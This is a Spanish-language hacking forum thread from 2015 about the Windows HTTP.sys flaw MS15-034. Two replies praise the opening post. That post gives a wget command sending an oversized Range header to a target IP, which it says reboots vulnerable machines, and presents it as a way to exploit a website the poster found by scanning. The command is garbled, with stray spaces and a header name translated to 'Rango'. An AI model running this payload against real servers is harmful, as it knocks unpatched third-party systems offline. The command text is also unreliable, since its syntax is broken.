comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Vulnerabilidad MS15-034 - HTTP.sys

  • 2 Respuestas
  • 3253 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Aforak

  • *
  • Underc0der
  • Mensajes: 13
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
  • Skype: Aforak Jackson
« en: Octubre 30, 2015, 11:49:44 am »
Muy buenas underc0deanos, quiero explicar un tipo de vulnerabilidad en los sistemas windows que me encontré tras realizar un scan a una web ya que he encontrado poca información sobre esto y lo poco que he encontrado quisiera compartirlo para la gente que alguna vez encuentre este tipo de vulnerabilidad, comencemos :

¿De qué se trata esta vulnerabilidad?
La versión de Windows que se ejecuta en el host remoto se ve afectado por una vulnerabilidad en la pila del protocolo HTTP (HTTP.sys) debido a la inadecuada programación del análisis sintáctico sobre las peticiones HTTP artesanales. Un atacante remoto puede aprovechar esto para ejecutar código arbitrario con privilegios del sistema.
¿Cómo sé si una web contiene este fallo?
La verdad, no lo sé, en mi caso como ya dije que realicé un scan a una web, observé que había notificado esta vulnerabilidad de estado crítico y me informé de ella para saber cómo parchearla y explotarla.

¿Cómo puedo explotarla?
Fácil, usaremos wget(comando incluido en la terminal de Linux, si quieremos tenerlo para Windows debemos descargarlo de aquí :http://gnuwin32.sourceforge.net/packages/wget.htm)
Una vez lo tengamos en nuestro equipo usaremos el siguiente comando :
Código: [Seleccionar]
wget -O / dev / null --header = "Rango: 0-18446744073709551615" http: // [dirección IP] /Este comando realiza el efecto de reiniciar el PC vulnerable, el comando wget consiste en descargar archivos de internet desde la terminal.
Si desean ver a qué sistemas afecta esta vulnerabilidad o tener más información --->https://technet.microsoft.com/library/security/ms15-034
En esa misma página pone que soluciones tiene de momento esta vulnerabilidad.
Si desean el escáner de vulnerabilidades Nessus aquí lo tienen --->https://www.tenable.com/products/nessus-home
Si desean ver el testeo de la penetración de esta vulnerabilidad aquí tenéis un vídeo realizado desde una VPS parece ser o algún software de virtualización

Espero que os sea útil mi aportamiento, grácias ;)
Fuente : Aforak / Jazze
« Última modificación: Octubre 30, 2015, 03:33:20 pm por Gabriela »
KILL KILL KILL

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5409
  • Actividad:
    20%
  • Reputación 33
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Octubre 30, 2015, 12:03:25 pm »
@Aforak! muy buen aporte bro! Ahora me pondré a verlo en detalle!
Te dejo +c0in

Muchas gracias por compartirlo!!

Saludos!
ANTRAX
« Última modificación: Octubre 30, 2015, 03:33:55 pm por Gabriela »


Desconectado Stuxnet

  • *
  • Underc0der
  • Mensajes: 259
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Devel Security
  • Twitter: _stuxnet
« Respuesta #2 en: Octubre 30, 2015, 01:53:39 pm »
Pedazo de aporte :3 muy bueno ..

Siempre vale la pena entrar y no ver temas c/p
« Última modificación: Octubre 30, 2015, 03:34:13 pm por Gabriela »

 

¿Te gustó el post? COMPARTILO!



Vulnerabilidad en Kali Linux Sana 2.0 CVE-2015-2008 Auditoria Omar Rodriguez

Iniciado por DaRK UnLiMiTeD

Respuestas: 0
Vistas: 2757
Último mensaje Septiembre 28, 2015, 10:37:40 pm
por DaRK UnLiMiTeD
Instalación de BadStore en VirtualBox [Vulnerabilidad virtual para practicar]

Iniciado por Stiuvert

Respuestas: 0
Vistas: 2711
Último mensaje Abril 23, 2012, 05:28:08 pm
por Stiuvert
Dirty COW - CVE-2016-5195 explotando vulnerabilidad en el Kernel de Linux

Iniciado por BrowserNet

Respuestas: 5
Vistas: 4117
Último mensaje Diciembre 26, 2016, 03:44:26 am
por Dr4g0n4Y
[Tutorial] Vulnerabilidad CSRF By ShadinessDark [Colaboracion de Zero Bits]

Iniciado por dracko.rx

Respuestas: 0
Vistas: 1996
Último mensaje Febrero 24, 2010, 03:24:51 pm
por dracko.rx
Grave Vulnerabilidad en MySQL/MariaDB (Autenticación sin Password)

Iniciado por CalebBucker

Respuestas: 1
Vistas: 2625
Último mensaje Junio 12, 2012, 04:20:50 pm
por ANTRAX